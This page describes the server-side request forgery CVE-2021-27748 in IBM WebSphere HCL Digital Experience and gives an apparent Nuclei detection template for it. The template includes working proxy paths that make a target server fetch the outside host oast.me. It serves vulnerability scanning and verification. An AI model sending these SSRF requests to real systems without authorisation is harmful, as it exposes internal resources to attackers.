漏洞描述
IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
CVE-2021-27748: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2021-27748
info:
name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
author: pdteam
severity: high
description: |
IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
impact: |
Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks.
remediation: |
Apply the latest security patches or updates provided by IBM to mitigate this vulnerability.
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
classification:
cve-id: CVE-2021-27748
cpe: cpe:2.3:a:ibm:websphere:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
shodan-query: http.html:"IBM WebSphere Portal"
product: websphere
vendor: ibm
tags: cve2021,cve,hcl,ibm,ssrf,websphere,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: word
internal: true
words:
- "IBM WebSphere Portal"
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
host-redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Interactsh Server"
# digest: 4a0a00473045022100879ffad1d5c529ce2700ceaf122f731ab4cbbb5645b02da6626dadccb3d0bec302203a58377451d4bf63c70abbbf1cb8bed00634004c7ef944a51876a4992609239e:922c64590222798bb761d5b6d8e72950